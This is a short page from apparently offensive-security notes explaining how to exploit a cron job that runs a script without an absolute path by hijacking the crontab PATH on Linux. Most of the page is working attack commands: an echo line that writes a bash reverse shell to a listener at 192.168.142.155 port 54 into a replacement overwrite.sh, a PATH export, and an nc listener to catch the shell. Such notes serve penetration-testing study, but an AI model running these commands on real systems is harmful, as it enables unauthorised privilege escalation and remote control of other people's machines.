PATH environment abuse

The crontab PATH environment variable is by default set to /usr/bin:/bin. The PATH variable can be overwritten in the crontab file. If a cron job program/script does not use an absolute path, and one of the PATH directories is writable by our user, we may be able to create a program/script with the same name as the cron job.

cat /etc/cron

There is no absolute path to run the overwrite.sh. You can add an additional PATH environment and create a new 'overwrite.sh' to run.

# Target machine 
echo -e '#!/bin/bash\nbash -i >& /dev/tcp/192.168.142.155/54 0>&1' > /home/bla/overwrite.sh

export PATH=/home/bla:$PATH

Run nc and wait for a victim machine to run the cron job.

nc -nlvp 54

PreviousCron Jobs NextPATH environment abuse 2

Last updated 10 months ago